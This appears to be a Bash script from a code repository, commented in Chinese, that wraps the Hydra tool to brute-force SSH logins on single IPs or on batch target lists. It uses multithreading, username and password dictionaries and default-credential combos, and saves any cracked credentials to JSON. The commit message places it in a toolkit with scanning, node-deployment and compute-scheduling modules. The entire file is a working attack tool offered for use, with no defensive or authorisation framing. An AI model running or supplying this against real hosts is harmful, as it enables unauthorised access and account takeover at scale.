048cc32afc
- 6 大模块:扫描/账号管理/节点部署/暴力破解/算力调度/监控运维 - SKILL 总控 + 子模块 SKILL - 排除大文件(>5MB)与敏感凭证 Co-authored-by: Cursor <cursoragent@cursor.com>
177 lines
4.5 KiB
Bash
Executable File
177 lines
4.5 KiB
Bash
Executable File
#!/bin/bash
|
||
# ================================================
|
||
# Hydra SSH 暴力破解包装脚本
|
||
# ================================================
|
||
# 对外部工具 Hydra (thc-hydra) 的封装,提供:
|
||
# - 快速单目标破解
|
||
# - 批量目标破解
|
||
# - 自定义字典 + 内置字典
|
||
# - 结果自动导出JSON
|
||
#
|
||
# 前置要求:brew install hydra (macOS) / apt install hydra (Linux)
|
||
#
|
||
# 用法:
|
||
# ./hydra_wrapper.sh single <IP> [PORT] # 单目标
|
||
# ./hydra_wrapper.sh batch <targets_file> # 批量
|
||
# ./hydra_wrapper.sh single <IP> --fast # 快速模式(仅Top50凭证)
|
||
# ================================================
|
||
|
||
set -euo pipefail
|
||
|
||
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
|
||
REFS_DIR="$SCRIPT_DIR/../references"
|
||
RESULTS_DIR="$SCRIPT_DIR/../results"
|
||
mkdir -p "$RESULTS_DIR"
|
||
|
||
# 字典文件
|
||
USER_DICT="$REFS_DIR/ssh_usernames.txt"
|
||
PASS_DICT="$REFS_DIR/ssh_passwords_top500.txt"
|
||
COMBO_DICT="$REFS_DIR/ssh_default_credentials.txt"
|
||
|
||
# 默认参数
|
||
THREADS=32
|
||
TIMEOUT=15
|
||
SSH_PORT=22
|
||
|
||
# 颜色输出
|
||
RED='\033[0;31m'
|
||
GREEN='\033[0;32m'
|
||
YELLOW='\033[1;33m'
|
||
NC='\033[0m'
|
||
|
||
usage() {
|
||
echo "用法:"
|
||
echo " $0 single <IP> [PORT] [--fast]"
|
||
echo " $0 batch <targets_file> [--fast]"
|
||
echo ""
|
||
echo "参数:"
|
||
echo " single 单目标破解"
|
||
echo " batch 批量破解(targets_file每行一个IP或IP:PORT)"
|
||
echo " --fast 快速模式,仅用组合字典(默认凭证对)"
|
||
echo ""
|
||
echo "示例:"
|
||
echo " $0 single 192.168.1.100"
|
||
echo " $0 single 192.168.1.100 2222"
|
||
echo " $0 batch targets.txt"
|
||
exit 1
|
||
}
|
||
|
||
check_hydra() {
|
||
if ! command -v hydra &> /dev/null; then
|
||
echo -e "${RED}[!] Hydra 未安装${NC}"
|
||
echo "安装方法:"
|
||
echo " macOS: brew install hydra"
|
||
echo " Ubuntu: sudo apt install hydra"
|
||
echo " CentOS: sudo yum install hydra"
|
||
exit 1
|
||
fi
|
||
}
|
||
|
||
# 单目标破解
|
||
single_attack() {
|
||
local TARGET_IP="$1"
|
||
local TARGET_PORT="${2:-$SSH_PORT}"
|
||
local FAST_MODE="${3:-false}"
|
||
local TIMESTAMP=$(date +%Y%m%d_%H%M%S)
|
||
local OUTPUT_FILE="$RESULTS_DIR/hydra_${TARGET_IP}_${TIMESTAMP}.json"
|
||
|
||
echo -e "${YELLOW}[*] SSH暴力破解: $TARGET_IP:$TARGET_PORT${NC}"
|
||
|
||
if [ "$FAST_MODE" = "true" ]; then
|
||
echo "[*] 快速模式:使用组合字典"
|
||
hydra -C "$COMBO_DICT" \
|
||
-s "$TARGET_PORT" \
|
||
-t "$THREADS" \
|
||
-w "$TIMEOUT" \
|
||
-o "$OUTPUT_FILE" \
|
||
-b json \
|
||
"$TARGET_IP" ssh
|
||
else
|
||
echo "[*] 完整模式:用户名×密码字典"
|
||
hydra -L "$USER_DICT" \
|
||
-P "$PASS_DICT" \
|
||
-s "$TARGET_PORT" \
|
||
-t "$THREADS" \
|
||
-w "$TIMEOUT" \
|
||
-o "$OUTPUT_FILE" \
|
||
-b json \
|
||
-e nsr \
|
||
"$TARGET_IP" ssh
|
||
fi
|
||
|
||
if [ -f "$OUTPUT_FILE" ] && [ -s "$OUTPUT_FILE" ]; then
|
||
echo -e "${GREEN}[+] 发现凭证! 结果已保存: $OUTPUT_FILE${NC}"
|
||
cat "$OUTPUT_FILE"
|
||
else
|
||
echo -e "${RED}[-] 未发现有效凭证${NC}"
|
||
fi
|
||
}
|
||
|
||
# 批量破解
|
||
batch_attack() {
|
||
local TARGETS_FILE="$1"
|
||
local FAST_MODE="${2:-false}"
|
||
|
||
if [ ! -f "$TARGETS_FILE" ]; then
|
||
echo -e "${RED}[!] 目标文件不存在: $TARGETS_FILE${NC}"
|
||
exit 1
|
||
fi
|
||
|
||
local TOTAL=$(grep -c -v '^$\|^#' "$TARGETS_FILE" || true)
|
||
local CURRENT=0
|
||
|
||
echo -e "${YELLOW}[*] 批量SSH暴力破解: $TOTAL 个目标${NC}"
|
||
|
||
while IFS= read -r line; do
|
||
[[ -z "$line" || "$line" =~ ^# ]] && continue
|
||
((CURRENT++)) || true
|
||
|
||
# 解析 IP:PORT
|
||
local IP PORT
|
||
if [[ "$line" == *":"* ]]; then
|
||
IP="${line%%:*}"
|
||
PORT="${line##*:}"
|
||
else
|
||
IP="$line"
|
||
PORT="$SSH_PORT"
|
||
fi
|
||
|
||
echo -e "\n${YELLOW}[$CURRENT/$TOTAL] $IP:$PORT${NC}"
|
||
single_attack "$IP" "$PORT" "$FAST_MODE" || true
|
||
|
||
done < "$TARGETS_FILE"
|
||
|
||
echo -e "\n${GREEN}[+] 批量破解完成!结果目录: $RESULTS_DIR/${NC}"
|
||
}
|
||
|
||
# 主逻辑
|
||
main() {
|
||
check_hydra
|
||
|
||
if [ $# -lt 2 ]; then
|
||
usage
|
||
fi
|
||
|
||
local MODE="$1"
|
||
shift
|
||
|
||
local FAST_MODE="false"
|
||
if [[ "${*}" == *"--fast"* ]]; then
|
||
FAST_MODE="true"
|
||
fi
|
||
|
||
case "$MODE" in
|
||
single)
|
||
single_attack "$1" "${2:-$SSH_PORT}" "$FAST_MODE"
|
||
;;
|
||
batch)
|
||
batch_attack "$1" "$FAST_MODE"
|
||
;;
|
||
*)
|
||
usage
|
||
;;
|
||
esac
|
||
}
|
||
|
||
main "$@"
|